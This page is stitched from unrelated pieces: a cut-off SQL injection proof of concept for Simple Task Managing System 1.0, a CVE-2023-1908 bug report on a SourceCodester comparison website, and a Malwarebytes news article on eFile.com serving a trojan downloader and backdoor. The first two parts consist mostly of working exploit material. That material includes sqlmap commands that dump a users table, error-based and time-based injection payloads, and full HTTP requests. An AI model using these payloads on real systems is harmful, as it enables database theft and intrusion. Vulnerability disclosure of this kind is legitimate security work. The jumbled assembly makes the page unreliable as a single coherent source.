application, access or modify data, or exploit latest vulnerabilities in the underlying database.2. Proof of Concept:----------------------In sqlmap use 'login' parameter or 'password' parameter to dump users table from 'tasker' database. Then run SQLmap to extract the data from the database:sqlmap.py -u "http://localhost/TaskManagingSystem/loginValidation.php" -p "login" --risk="3" --level="3" --method="POST" --data="login=test&password=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/TaskManagingSystem/login.php" --dbms="MySQL" --batch --dbs -D tasker -T users --dumpsqlmap.py -u "http://localhost/TaskManagingSystem/loginValidation.php" -p "password" --risk="3" --level="3" --method="POST" --data="login=&password=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/TaskManagingSystem/login.php" --dbms="MySQL" --batch --dbs -D tasker -T users --dump3. Example payload:-----------------------1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%274. Burpsuite request on 'login' parameter:----------------------POST /TaskManagingSystem/loginValidation.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 312Origin: http://localhostConnection: closeReferer: http://localhost/TaskManagingSystem/login.phpCookie: PHPSESSID=samt0gti09djsstpqaj0pg4ta8Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=P@ssw0rd!5. Burpsuite request on 'password' parameter:----------------------POST /TaskManagingSystem/loginValidation.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 307Origin: http://localhostConnection: closeReferer: http://localhost/TaskManagingSystem/login.phpCookie: PHPSESSID=samt0gti09djsstpqaj0pg4ta8Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1login=user&password=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

Simple Task Managing System 1.0 SQL Injection

A vulnerability was found in SourceCodester Simple Mobile Comparison Website 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/categories/view_category.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225150 is the identifier assigned to this vulnerability.

**Simple Mobile Comparison Website v1.0 has SQL injection**

BUG\_Author:Zhang RuiMing

Website source address:https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html

Vulnerability File: /mcw/admin/categories/view\_category.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x61626364,(select (elt(111=111,1))),0x51525354,floor(rand(0)\*2))x from information\_schema.plugins group by x)a) and 'a'='a

    GET /mcw/admin/categories/view_category.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x61626364,(select%20(elt(111=111,1))),0x51525354,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)%20and%20%27a%27=%27a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=1n6947aiql2hh8itbuvff2apro
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(20)))o) and 'o'='o

    GET /mcw/admin/categories/view_category.php?id=1%27%20and%20(select%201%20from%20(select(sleep(20)))o)%20and%20%27o%27=%27o HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=1n6947aiql2hh8itbuvff2apro
    Connection: close
    

Server response time is 20 seconds

CVE-2023-1908: bug_report/SQLi-1.md at main · Kerkong/bug_report

Categories: News
Categories: Scams
Tags: tax scams

Tags:  efile.com

Tags:  US tax 2023

Tags:  backdoor

Tags:  Trojan

Tags:  Johannes Ullrich

Tags:  MalwareHunterTeam

Tags:  /u/SaltyPotter

Tags:  fake network error notification

Cybercriminals have compromised eFile.com to host malicious code that allows for the download of Trojans.



(Read more...)




The post Visitors of tax return e-file service may have downloaded malware appeared first on Malwarebytes Labs.

The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. Note this security incident only concerns eFile.com, not the IRS' e-file infrastructure and other similar-sounding domains.

As of this writing, eFile.com is clean. Users can access it without worry.

**The attack began 18 days ago**

The incident first arose as a possibility that something might be up with the website. A Reddit user encountered a fake "Network Error" page when accessing www.efile.com_._ The page, as shown below, informed visitors their browser "uses an unsupported protocol," and that they need to click the link it provided to them to update their browser—a known tactic often used by scammers.

This fake error message used to come up when visiting the domain. Uncharacteristically, it told visitors to update their browsers. This made Redditors suspect the domain was hijacked. (Source: /u/SaltyPotter, original image cropped to fit)

This, however, is no scam.

Known figures in cybersecurity, such as MalwareHunterTeam (@malwarehunterteam) and Johannes Ullrich (@johullrich) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis.

According to both MalwareHunterTeam and Ullrich, a malformed JS file named _popper.js_ contains encrypted malicious code—meaning it cannot be read plainly. Its purpose is to load another JS script called _update.js_ hosted on an Amazon Web Services (AWS) site. _update.js_ contains code used to display the fake error page.

_popper.js_ is a legitimate file modified to do malicious tasks. Because almost every page within the eForm website loads it, the malicious activities we mentioned are triggered every time a user visits any site page.

_update.js_ also contains two hard-coded download URLs, both served on the malicious domain _infoamanewonliag\[.\]online_. The two payloads are for two specific browsers visitors typically use, Chrome and Firefox.

"So different browsers get different payloads," says Ullrich. Chrome users get a payload named "update.exe" with a valid signature from Sichuan Niurui Science and Technology. Firefox users get "installer.exe." There is no indication if browsers based on Chromium (where Chrome is based) or Quantum (where Firefox is based) could also receive the payloads.

BleepingComputer has independently confirmed the payloads connect to an IP address hosted by Alibaba in China. The same IP also hosts the illicit domain the payloads were downloaded from.

These executables were written in Python. Malwarebytes detects them as **Trojan.Downloader.Python**.

As of Wednesday, _popper.js_ is free of malicious code.

**The backdoor**

Once users execute the payload, a PHP script runs quietly in the background. BleepingComputer's analysis shows that every 10 seconds, the backdoor script connects to a remote command and control (C2) server to receive one or more tasks to perform on the affected system. These include "executing a command and sending its output back to the attackers or downloading additional files onto the computer."

The backdoor is unsophisticated, but it's enough to give attackers access to the entire system, including company-owned devices.

"The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned," says BleepingComputer.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tag

#php